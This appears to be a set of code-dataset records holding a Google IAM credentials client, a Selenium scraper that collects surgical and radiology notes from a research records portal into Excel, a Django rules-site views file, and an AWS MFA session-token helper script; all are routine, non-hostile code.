The resource name of the service account for which the\n credentials are requested, in the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n audience (str): Required. The audience for the token, such as the API or account that this token\n grants access to.\n delegates (list[str]): The sequence of service accounts in a delegation chain. Each service\n account must be granted the ``roles/iam.serviceAccountTokenCreator``\n role on its next service account in the chain. The last service account\n in the chain must be granted the\n ``roles/iam.serviceAccountTokenCreator`` role on the service account\n that is specified in the ``name`` field of the request.\n\n The delegates must have the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n include_email (bool): Include the service account email in the token. If set to ``true``, the\n token will contain ``email`` and ``email_verified`` claims.\n retry (Optional[google.api_core.retry.Retry]): A retry object used\n to retry requests. If ``None`` is specified, requests will\n be retried using a default configuration.\n timeout (Optional[float]): The amount of time, in seconds, to wait\n for the request to complete. Note that if ``retry`` is\n specified, the timeout applies to each individual attempt.\n metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata\n that is provided to the method.\n\n Returns:\n A :class:`~google.cloud.iam_credentials_v1.types.GenerateIdTokenResponse` instance.\n\n Raises:\n google.api_core.exceptions.GoogleAPICallError: If the request\n failed for any reason.\n google.api_core.exceptions.RetryError: If the request failed due\n to a retryable error and retry attempts failed.\n ValueError: If the parameters are invalid.\n \"\"\"\n # Wrap the transport method to add retry and timeout logic.\n if \"generate_id_token\" not in self._inner_api_calls:\n self._inner_api_calls[\n \"generate_id_token\"\n ] = google.api_core.gapic_v1.method.wrap_method(\n self.transport.generate_id_token,\n default_retry=self._method_configs[\"GenerateIdToken\"].retry,\n default_timeout=self._method_configs[\"GenerateIdToken\"].timeout,\n client_info=self._client_info,\n )\n\n request = common_pb2.GenerateIdTokenRequest(\n name=name,\n audience=audience,\n delegates=delegates,\n include_email=include_email,\n )\n if metadata is None:\n metadata = []\n metadata = list(metadata)\n try:\n routing_header = [(\"name\", name)]\n except AttributeError:\n pass\n else:\n routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(\n routing_header\n )\n metadata.append(routing_metadata)\n\n return self._inner_api_calls[\"generate_id_token\"](\n request, retry=retry, timeout=timeout, metadata=metadata\n )\n\n def sign_blob(\n self,\n name,\n payload,\n delegates=None,\n retry=google.api_core.gapic_v1.method.DEFAULT,\n timeout=google.api_core.gapic_v1.method.DEFAULT,\n metadata=None,\n ):\n \"\"\"\n Signs a blob using a service account's system-managed private key.\n\n Example:\n >>> from google.cloud import iam_credentials_v1\n >>>\n >>> client = iam_credentials_v1.IAMCredentialsClient()\n >>>\n >>> name = client.service_account_path('[PROJECT]', '[SERVICE_ACCOUNT]')\n >>>\n >>> # TODO: Initialize `payload`:\n >>> payload = b''\n >>>\n >>> response = client.sign_blob(name, payload)\n\n Args:\n 
name (str): Required. The resource name of the service account for which the\n credentials are requested, in the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n payload (bytes): Required. The bytes to sign.\n delegates (list[str]): The sequence of service accounts in a delegation chain. Each service\n account must be granted the ``roles/iam.serviceAccountTokenCreator``\n role on its next service account in the chain. The last service account\n in the chain must be granted the\n ``roles/iam.serviceAccountTokenCreator`` role on the service account\n that is specified in the ``name`` field of the request.\n\n The delegates must have the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n retry (Optional[google.api_core.retry.Retry]): A retry object used\n to retry requests. If ``None`` is specified, requests will\n be retried using a default configuration.\n timeout (Optional[float]): The amount of time, in seconds, to wait\n for the request to complete. Note that if ``retry`` is\n specified, the timeout applies to each individual attempt.\n metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata\n that is provided to the method.\n\n Returns:\n A :class:`~google.cloud.iam_credentials_v1.types.SignBlobResponse` instance.\n\n Raises:\n google.api_core.exceptions.GoogleAPICallError: If the request\n failed for any reason.\n google.api_core.exceptions.RetryError: If the request failed due\n to a retryable error and retry attempts failed.\n ValueError: If the parameters are invalid.\n \"\"\"\n # Wrap the transport method to add retry and timeout logic.\n if \"sign_blob\" not in self._inner_api_calls:\n self._inner_api_calls[\n \"sign_blob\"\n ] = google.api_core.gapic_v1.method.wrap_method(\n self.transport.sign_blob,\n default_retry=self._method_configs[\"SignBlob\"].retry,\n default_timeout=self._method_configs[\"SignBlob\"].timeout,\n client_info=self._client_info,\n )\n\n request = common_pb2.SignBlobRequest(\n name=name, payload=payload, delegates=delegates\n )\n if metadata is None:\n metadata = []\n metadata = list(metadata)\n try:\n routing_header = [(\"name\", name)]\n except AttributeError:\n pass\n else:\n routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(\n routing_header\n )\n metadata.append(routing_metadata)\n\n return self._inner_api_calls[\"sign_blob\"](\n request, retry=retry, timeout=timeout, metadata=metadata\n )\n\n def sign_jwt(\n self,\n name,\n payload,\n delegates=None,\n retry=google.api_core.gapic_v1.method.DEFAULT,\n timeout=google.api_core.gapic_v1.method.DEFAULT,\n metadata=None,\n ):\n \"\"\"\n Signs a JWT using a service account's system-managed private key.\n\n Example:\n >>> from google.cloud import iam_credentials_v1\n >>>\n >>> client = iam_credentials_v1.IAMCredentialsClient()\n >>>\n >>> name = client.service_account_path('[PROJECT]', '[SERVICE_ACCOUNT]')\n >>>\n >>> # TODO: Initialize `payload`:\n >>> payload = ''\n >>>\n >>> response = client.sign_jwt(name, payload)\n\n Args:\n name (str): Required. The resource name of the service account for which the\n credentials are requested, in the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n payload (str): Required. 
The JWT payload to sign: a JSON object that contains a JWT Claims Set.\n delegates (list[str]): The sequence of service accounts in a delegation chain. Each service\n account must be granted the ``roles/iam.serviceAccountTokenCreator``\n role on its next service account in the chain. The last service account\n in the chain must be granted the\n ``roles/iam.serviceAccountTokenCreator`` role on the service account\n that is specified in the ``name`` field of the request.\n\n The delegates must have the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n retry (Optional[google.api_core.retry.Retry]): A retry object used\n to retry requests. If ``None`` is specified, requests will\n be retried using a default configuration.\n timeout (Optional[float]): The amount of time, in seconds, to wait\n for the request to complete. Note that if ``retry`` is\n specified, the timeout applies to each individual attempt.\n metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata\n that is provided to the method.\n\n Returns:\n A :class:`~google.cloud.iam_credentials_v1.types.SignJwtResponse` instance.\n\n Raises:\n google.api_core.exceptions.GoogleAPICallError: If the request\n failed for any reason.\n google.api_core.exceptions.RetryError: If the request failed due\n to a retryable error and retry attempts failed.\n ValueError: If the parameters are invalid.\n \"\"\"\n # Wrap the transport method to add retry and timeout logic.\n if \"sign_jwt\" not in self._inner_api_calls:\n self._inner_api_calls[\n \"sign_jwt\"\n ] = google.api_core.gapic_v1.method.wrap_method(\n self.transport.sign_jwt,\n default_retry=self._method_configs[\"SignJwt\"].retry,\n default_timeout=self._method_configs[\"SignJwt\"].timeout,\n client_info=self._client_info,\n )\n\n request = common_pb2.SignJwtRequest(\n name=name, payload=payload, delegates=delegates\n )\n if metadata is None:\n metadata = []\n metadata = list(metadata)\n try:\n routing_header = [(\"name\", name)]\n except AttributeError:\n pass\n else:\n routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(\n routing_header\n )\n metadata.append(routing_metadata)\n\n return self._inner_api_calls[\"sign_jwt\"](\n request, retry=retry, timeout=timeout, metadata=metadata\n )\n","sub_path":"iam/google/cloud/iam_credentials_v1/gapic/iam_credentials_client.py","file_name":"iam_credentials_client.py","file_ext":"py","file_size_in_byte":26165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
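Putting the pieces above together, a typical flow constructs the client from a key file and mints a short-lived access token; the project id, account email, and key path below are placeholders:

from google.cloud import iam_credentials_v1

client = iam_credentials_v1.IAMCredentialsClient.from_service_account_file('key.json')
name = client.service_account_path('my-project', 'robot@my-project.iam.gserviceaccount.com')
response = client.generate_access_token(
    name, scope=['https://www.googleapis.com/auth/cloud-platform'])
print(response.access_token)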
+{"seq_id":"348138679","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\nimport time\nimport data\nimport secret\nimport pandas\n\n# newestDateformat = datetime.strptime('2001-01-24', '%Y-%m-%d')\n\npatientIdArrayLength = len(data.testPatientArray)\n\n\naggregatePatientInfo = {\n \"patientId\" : [],\n \"patientFirstSurgeryDate\" : [],\n \"firstOperationHeader\" : [],\n \"firstOperationNotes\" : [],\n \"postOpRadReport1Notes\" : [],\n \"postOpRadReport2Notes\" : [],\n \"postOpRadReport3Notes\" : [],\n \"patientNextSurgeryDate\" : [],\n \"nextOperationHeader\" : [],\n \"nextOperationNotes\" : [],\n \"preOpRadReport1Notes\" : [],\n \"preOpRadReport2Notes\" : [],\n \"preOpRadReport3Notes\" :[]\n}\n\n# Open the browser to the SD page\nchrome_path = r\"/usr/local/bin/chromedriver\"\ndriver = webdriver.Chrome(chrome_path)\ndriver.get('https://sd.app.vumc.org/sd-discover/')\ntime.sleep(8)\n\n\n# Login to account\nvunetid = driver.find_element_by_xpath('//*[@id=\"gwt-uid-3\"]')\npassword = driver.find_element_by_xpath('//*[@id=\"gwt-uid-5\"]')\nfirst_submit_button = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div/div[5]/div')\n# Keep username and pass in secret file on local machine for security purposes\nvunetid.send_keys(secret.username)\npassword.send_keys(secret.password)\nfirst_submit_button.click()\ntime.sleep(15)\n\n\n# Choose Recurrence Database\nrecentDataSets = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div/div[1]/div/div[2]/div/div[2]/div/div/div/div/div/div/div[2]/div[1]/table/tbody/tr[1]/td[1]/div')\nrecentDataSets.click()\ntime.sleep(8)\nrecurrence = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div/div[1]/div/div[2]/div/div[2]/div/div/div/div/div/div/div[2]/div[1]/table/tbody/tr[2]/td[1]')\nrecurrence.click()\ntime.sleep(8)\nreviewSetResults = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div/div[3]/div/div/div/div/div/div[3]/div/div/div/div/div[2]/div/div/div/table/tbody/tr[1]/td[3]/div')\nreviewSetResults.click()\ntime.sleep(10)\n\ndef firstfilterRadiologyReports():\n # Filter Radiology Reports for Individual Patient\n openFiltersButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[1]/div/div/div[1]/div')\n openFiltersButton.click()\n time.sleep(5)\n openFilterDropdownButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[1]/div/div[2]/div')\n openFilterDropdownButton.click()\n time.sleep(5)\n radiologyReportsOption = driver.find_element_by_xpath('//*[@id=\"VAADIN_COMBOBOX_OPTIONLIST\"]/div/div[2]/table/tbody/tr[11]')\n radiologyReportsOption.click()\n time.sleep(5)\n applyFilter = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[2]/div/div[1]/div')\n 
applyFilter.click()\n time.sleep(5)\n\ndef secondfilterRadiologyReports():\n # Filter Radiology Reports for Individual Patient\n time.sleep(5)\n openFilterDropdownButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[1]/div/div[2]/div')\n openFilterDropdownButton.click()\n time.sleep(5)\n radiologyReportsOption = driver.find_element_by_xpath('//*[@id=\"VAADIN_COMBOBOX_OPTIONLIST\"]/div/div[2]/table/tbody/tr[11]')\n radiologyReportsOption.click()\n time.sleep(5)\n applyFilter = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[2]/div/div[1]/div')\n applyFilter.click()\n time.sleep(5)\n\ndef iterativePatientResults():\n #Filter by PatientId\n for i in range(patientIdArrayLength): \n if i > 0:\n clearFilterButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[2]/div/div[2]/div')\n time.sleep(1)\n clearFilterButton.click()\n searchPatient = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[1]/div/div[2]/div/div/input')\n searchPatient.clear()\n time.sleep(2)\n searchPatient.send_keys(data.patientIdArray[i])\n\n # adding patientId to data\n aggregatePatientInfo[\"patientId\"].append(data.patientIdArray[i])\n\n time.sleep(5)\n patientRow = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[1]/div/div[3]/div[1]/table/tbody/tr')\n patientRow.click()\n time.sleep(5)\n # we may actually not want to filter for reports since we need to do everything relative to all entries\n # filterRadiologyReports()\n # the below variable is storing the date of the patient's first operation\n firstSurgeryDate = data.firstSurgeryDateArray[i]\n print(firstSurgeryDate)\n # the below adds the first surgery date to the aggregate patient dataframe\n aggregatePatientInfo[\"patientFirstSurgeryDate\"].append(firstSurgeryDate)\n # the below variable will store the header text and the index position\n firstSurgeryHeader = ''\n firstSurgeryDivIndex = 0\n # Get the dates of all report sections so that you can compare them properly\n reportHeaders = driver.find_elements_by_class_name('doc-content')\n time.sleep(3)\n reportHeadersLength = len(reportHeaders)\n time.sleep(3)\n for firstReportHeaderIterator in range(reportHeadersLength):\n allText = reportHeaders[firstReportHeaderIterator].text\n date = allText[0:10]\n reportType = allText[-16:]\n dateFormat = time.strptime(date, '%Y-%m-%d')\n if dateFormat == time.strptime(firstSurgeryDate, '%m-%d-%y') and reportType == 'OPERATIVE REPORT':\n firstSurgeryHeader = reportHeaders[firstReportHeaderIterator].text\n firstSurgeryDivIndex = firstReportHeaderIterator\n break\n reportContent = driver.find_elements_by_class_name('doc-content-div')\n firstSurgeryNotes = reportContent[firstSurgeryDivIndex].text\n\n # adding first surgery header and notes to data\n 
aggregatePatientInfo[\"firstOperationHeader\"].append(firstSurgeryHeader)\n aggregatePatientInfo[\"firstOperationNotes\"].append(firstSurgeryNotes)\n\n # start filtering radiology reports\n if i == 0:\n firstfilterRadiologyReports()\n else:\n secondfilterRadiologyReports()\n\n radiologyReportHeaders = driver.find_elements_by_class_name('doc-content')\n radiologyReportNotes = driver.find_elements_by_class_name('doc-content-div')\n radiologyReportHeadersListLength = len(radiologyReportHeaders)\n time.sleep(3)\n firstThreeRadiologyReports = []\n\n # this for loop finds the notes for the three radiology report after the first surgery date\n for radiologyReportHeaderIterator in range(radiologyReportHeadersListLength):\n radiologyReportText = radiologyReportHeaders[radiologyReportHeaderIterator].text\n radiolgyReportDate = radiologyReportText[0:10]\n radiolgyReportDateFormat = time.strptime(radiolgyReportDate, '%Y-%m-%d')\n if radiolgyReportDateFormat >= time.strptime(firstSurgeryDate, '%m-%d-%y'):\n if len(firstThreeRadiologyReports) < 3:\n class firstRadiologyReportInfo:\n reportHeader = radiologyReportText\n reportIndex = radiologyReportHeaderIterator\n reportNotes = radiologyReportNotes[radiologyReportHeaderIterator].text\n firstThreeRadiologyReports.append(firstRadiologyReportInfo)\n else:\n break\n \n for yo in firstThreeRadiologyReports:\n print(yo.reportNotes)\n\n # this code accounts for a patient having less than 3 radiology reports\n # it goes in and adds blank report to get a patients total up to 3 if need be\n firstRadReportsLength = len(firstThreeRadiologyReports)\n if (firstRadReportsLength < 3):\n numberToAdd = 3 - firstRadReportsLength\n for adds in range(numberToAdd):\n class blankRadiologyReportInfo:\n reportHeader = ''\n reportIndex = ''\n reportNotes = ''\n firstThreeRadiologyReports.append(blankRadiologyReportInfo)\n \n\n aggregatePatientInfo[\"postOpRadReport1Notes\"].append(firstThreeRadiologyReports[0].reportNotes)\n aggregatePatientInfo[\"postOpRadReport2Notes\"].append(firstThreeRadiologyReports[1].reportNotes)\n aggregatePatientInfo[\"postOpRadReport3Notes\"].append(firstThreeRadiologyReports[2].reportNotes)\n \n\n \n # This begins the fining of the second surgery notes\n nextSurgeryDate = data.nextSurgeryDateArray[i]\n aggregatePatientInfo[\"patientNextSurgeryDate\"].append(nextSurgeryDate)\n nextSurgeryDivIndex = 0\n nextSurgeryHeader = ''\n clearFilterButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[2]/div/div[2]/div')\n clearFilterButton.click()\n time.sleep(5)\n reportHeaders = driver.find_elements_by_class_name('doc-content')\n reportHeadersLength = len(reportHeaders)\n for secondReportHeaderIterator in range(reportHeadersLength):\n allText = reportHeaders[secondReportHeaderIterator].text\n date = allText[0:10]\n reportType = allText[-16:]\n dateFormat = time.strptime(date, '%Y-%m-%d')\n if dateFormat == time.strptime(nextSurgeryDate, '%m-%d-%y') and reportType == 'OPERATIVE REPORT':\n nextSurgeryHeader = reportHeaders[secondReportHeaderIterator].text\n nextSurgeryDivIndex = secondReportHeaderIterator\n break\n reportContent = driver.find_elements_by_class_name('doc-content-div') \n nextSurgeryNotes = reportContent[nextSurgeryDivIndex].text\n\n\n aggregatePatientInfo[\"nextOperationHeader\"].append(nextSurgeryHeader)\n 
aggregatePatientInfo[\"nextOperationNotes\"].append(nextSurgeryNotes)\n\n\n\n secondfilterRadiologyReports()\n reversedRadiologyReportHeaders = driver.find_elements_by_class_name('doc-content')\n reversedRadiologyReportHeaders.reverse()\n reversedRadiologyReportNotes = driver.find_elements_by_class_name('doc-content-div')\n reversedRadiologyReportNotes.reverse()\n reversedRadiologyReportHeadersLength = len(reversedRadiologyReportHeaders)\n time.sleep(3)\n LastThreeRadiologyReports = []\n\n # this for loop finds the notes for the three radiology report after the first surgery date\n for reversedRadiologyReportHeaderIterator in range(reversedRadiologyReportHeadersLength):\n reveresdRadiologyReportText = reversedRadiologyReportHeaders[reversedRadiologyReportHeaderIterator].text\n reversedRadiolgyReportDate = reveresdRadiologyReportText[0:10]\n reversedRadiolgyReportDateFormat = time.strptime(reversedRadiolgyReportDate, '%Y-%m-%d')\n if reversedRadiolgyReportDateFormat <= time.strptime(nextSurgeryDate, '%m-%d-%y'):\n if len(LastThreeRadiologyReports) < 3:\n class lastRadiologyReportInfo:\n reversedReportHeader = reveresdRadiologyReportText\n reversedReportIndex = reversedRadiologyReportHeaderIterator\n reversedReportNotes = reversedRadiologyReportNotes[reversedRadiologyReportHeaderIterator].text\n LastThreeRadiologyReports.append(lastRadiologyReportInfo)\n else:\n break\n \n\n # this code accounts for a patient having less than 3 radiology reports\n # it goes in and adds blank report to get a patients total up to 3 if need be\n LastRadReportsLength = len(LastThreeRadiologyReports)\n if (LastRadReportsLength < 3):\n numberToAdd = 3 - LastRadReportsLength\n for adds in range(numberToAdd):\n class blankRadiologyReportInfo:\n reversedReportHeader = ''\n reversedReportIndex = ''\n reversedReportNotes = ''\n LastThreeRadiologyReports.append(blankRadiologyReportInfo)\n\n \n aggregatePatientInfo[\"preOpRadReport1Notes\"].append(LastThreeRadiologyReports[0].reversedReportNotes)\n aggregatePatientInfo[\"preOpRadReport2Notes\"].append(LastThreeRadiologyReports[1].reversedReportNotes)\n aggregatePatientInfo[\"preOpRadReport3Notes\"].append(LastThreeRadiologyReports[2].reversedReportNotes)\n\n\n\niterativePatientResults()\n\ndf = pandas.DataFrame(aggregatePatientInfo)\n\ndf.to_excel(\"test_output.xlsx\")\n\n\n\n\n\n \n","sub_path":"selenium_scraper.py","file_name":"selenium_scraper.py","file_ext":"py","file_size_in_byte":13245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"208884408","text":"# Create your views here.\n# -*- coding:utf-8 -*-\n\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.template import RequestContext\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom rules.models import RuleType, Rule, RulePart\nfrom lib.myqs import MyQS\nimport inspect\nfrom django.contrib.auth import logout, authenticate, login\n\ndef index(request,type='all',id=0):\n\tprint (\"Call index\")\n\ton_page = int(3)\n\tpage_id = int(1)\n\tparam = __for_all()\n\tparam['content'] = 'Это строка';\n\tparam['type'] = (type if type != 'all' else 'none')\n\tparam['id'] = (id if id else 'none')\n\n\tlist = ''\n\tmyqs = ''\n\tstart = (page_id-1)*on_page\n\tfinish = page_id*on_page+1\n\n\tif type == 'all':\n\t\t# первая страница, показываем topten\n\t\trules = RulePart.objects.filter(rule_id__topten=True).filter(sort=10).order_by('-id')[:on_page];\n\t\tmyqs = MyQS(rules,on_page,page_id)\n\t\tparam['list'] = myqs.get();\n\telse:\n\t\trules = RulePart.objects.filter(rule_id__type__url_name=type).filter(sort=10).order_by('-id')[:on_page];\n\t\tmyqs = MyQS(rules,on_page,page_id)\n\t\tparam['list'] = myqs.get();\n\t\tparam['next_page']=myqs.get_next_page()\n\t\tparam['prev_page']=myqs.get_prev_page()\n\n\n\treturn render_to_response('rules/index.html', param)\n\ndef show_rule(request, rule_id,back_url=\"/\",page_no=1):\n\tprint (\"Call show_rule\")\n\tparam = __for_all()\n\tparam['list'] = RulePart.objects.filter(rule_id=rule_id).order_by('sort')\n\tparam['game'] = Rule.objects.get(pk=rule_id)\n\tparam['back_url'] = back_url\n\tparam['page_no'] = page_no\n\treturn render_to_response('rules/rule.html', param)\n\ndef myadmin(request):\n\tyes = 'no'\n\tif request.user.is_authenticated():\n\t\tyes = 'yes'\n\t\tparam = __for_all()\n\t\tparam['username'] = request.user.username\n\t\treturn render_to_response('rules/myadmin.html', param)\n\telse:\n\t\treturn HttpResponseRedirect('/rules/a/login/')\n\ndef gologin():\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\tuser = authenticate(username=username, password=password)\n\tif user is not None:\n\t\tif user.is_active:\n\t\t\tlogin(request, user)\n\t\t\treturn HttpResponseRedirect('/rules/a/') \n\t\telse:\n\t\t\treturn HttpResponseRedirect('/rules/a/login/')\n\telse:\n\t\treturn HttpResponseRedirect('/rules/a/login/')\n\ndef mylogin(request):\n\tparam = __for_all()\n\treturn render_to_response('rules/mylogin.html', param)\n\ndef mylogout(request):\n\tlogout(request)\n\treturn HttpResponseRedirect('/')\n\ndef __for_all():\n\t'''\n\tдействия для всех случаев\n\t'''\n\tp = {}\n\tp['fname'] = inspect.stack()[1][3]\n\tp['menu'] = RuleType.objects.all().order_by('show_name');\n\treturn p","sub_path":"rules/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"10030436","text":"\"\"\"If you are using AWS CLI with an IAM account that requires MFA\r\nit's easy enough to query for temporary credentials \r\nhttps://aws.amazon.com/premiumsupport/knowledge-center/authenticate-mfa-cli/\r\nYou can manually export them (or try to automate that in bash with the use of e.g. jq to parse JSON response)\r\nHowever, if you are in the need of updating your .aws/credentials file, \r\ndoing it manually every time your session token will expire is an annoying endeavor. \r\nThis script will use your currently chosen AWS_PROFILE (default when nothing is selected) to:\r\n1. Use sts get-session-token with MFA code You provide to get temporary credentials. \r\n2. Create an MFA profile in your .aws/credentials file if this profile does not exist \r\n3. Update an MFA profile in your .aws/credentials file if this profile does exist. \r\nTESTED ONLY ON WINDOWS AND LINUX !!!!\r\n\"\"\"\r\n\r\nimport argparse\r\nimport boto3\r\nfrom dateutil import tz\r\nimport sys\r\nfrom pathlib import Path\r\n\r\nserial_number = \"\"\r\ntoken_code = \"\"\r\nduration = \"\"\r\nAccessKeyId = \"\"\r\nSecretAccessKey = \"\"\r\nSessionToken = \"\"\r\naws_profile_to_use = \"\"\r\n\r\ndef main():\r\n pull_args()\r\n get_temp_credentials()\r\n update_profiles()\r\n\r\ndef pull_args():\r\n global serial_number\r\n global token_code\r\n global duration\r\n global aws_profile_to_use\r\n parser = argparse.ArgumentParser(description=__doc__)\r\n parser.add_argument(\"-s\", \"--serial-number\", required = True, help = \"MFA device ARN\")\r\n parser.add_argument(\"-t\", \"--token-code\", required = True, help = \"One time password / token generated by MFA device\")\r\n parser.add_argument(\"-d\", \"--duration\", default = 3600, help = \"Session duration in seconds defaults to 3600 sec (1h) \" )\r\n parser.add_argument(\"-p\", \"--aws-profile\", default = \"default\", help = \"Profile to use when pulling credentials. Defaults to 'default'\" )\r\n args = parser.parse_args()\r\n aws_profile_to_use = args.aws_profile\r\n serial_number = args.serial_number\r\n token_code = args.token_code\r\n duration = int(args.duration)\r\n\r\ndef get_temp_credentials():\r\n global serial_number\r\n global token_code\r\n global duration\r\n global AccessKeyId\r\n global SecretAccessKey\r\n global SessionToken\r\n global aws_profile_to_use\r\n\r\n session = boto3.Session(profile_name=aws_profile_to_use)\r\n client = session.client('sts')\r\n response = client.get_session_token(\r\n DurationSeconds=duration,\r\n SerialNumber=serial_number,\r\n TokenCode=token_code\r\n )\r\n AccessKeyId = response['Credentials']['AccessKeyId']\r\n SecretAccessKey = response['Credentials']['SecretAccessKey']\r\n SessionToken = response['Credentials']['SessionToken']\r\n expiry_date = response['Credentials']['Expiration']\r\n current_time_zone = tz.tzlocal()\r\n current_tz_exp_date = expiry_date.astimezone(current_time_zone)\r\n print(f'Bear in mind that session will expire at: {expiry_date} UTC. 
In your local Time Zone that is: {current_tz_exp_date}')\r\n\r\ndef update_profiles():\r\n update_config_file()\r\n update_credentials_file()\r\n\r\ndef update_credentials_file():\r\n global AccessKeyId\r\n global SecretAccessKey\r\n global SessionToken\r\n path = calculate_path()+\"credentials\"\r\n current_file = open(path, \"r\")\r\n string_list = current_file.readlines()\r\n current_file.close()\r\n if '[mfa]\\n' in string_list:\r\n print('Updating existing profile in credentials file')\r\n profile_index = string_list.index('[mfa]\\n')\r\n string_list[profile_index+1] = f'aws_access_key_id = {AccessKeyId}\\n'\r\n string_list[profile_index+2] = f'aws_secret_access_key = {SecretAccessKey}\\n'\r\n string_list[profile_index+3] = f'aws_session_token = {SessionToken}\\n'\r\n else:\r\n print('Creating new profile in credentials file')\r\n string_list.append('\\n')\r\n string_list.append('[mfa]\\n')\r\n string_list.append(f'aws_access_key_id = {AccessKeyId}\\n')\r\n string_list.append(f'aws_secret_access_key = {SecretAccessKey}\\n')\r\n string_list.append(f'aws_session_token = {SessionToken}\\n')\r\n\r\n current_file = open(path, \"w\")\r\n content = \"\".join(string_list)\r\n current_file.write(content)\r\n current_file.close()\r\n\r\n\r\ndef update_config_file():\r\n path = calculate_path()+\"config\"\r\n current_file = open(path, \"r\")\r\n string_list = current_file.readlines()\r\n current_file.close()\r\n if '[mfa]\\n' in string_list:\r\n print('Updating existing profile in config file')\r\n profile_index = string_list.index('[mfa]\\n')\r\n string_list[profile_index+1] = 'region = eu-west-1\\n'\r\n else:\r\n print('Creating new profile in config file')\r\n string_list.append('\\n')\r\n string_list.append('[mfa]\\n')\r\n string_list.append('region = eu-west-1\\n')\r\n\r\n current_file = open(path, \"w\")\r\n content = \"\".join(string_list)\r\n current_file.write(content)\r\n current_file.close()\r\n\r\ndef calculate_path():\r\n home = str(Path.home())\r\n return f\"{home}/.aws/\"\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"update_credentials_with_mfa.py","file_name":"update_credentials_with_mfa.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
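Once the script above has written the [mfa] section, any boto3 (or AWS CLI) call can consume it by profile name. A quick smoke test; the profile name "mfa" is the one hard-coded by the script:

import boto3

session = boto3.Session(profile_name="mfa")
# prints the account id if the temporary credentials are valid
print(session.client("sts").get_caller_identity()["Account"])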
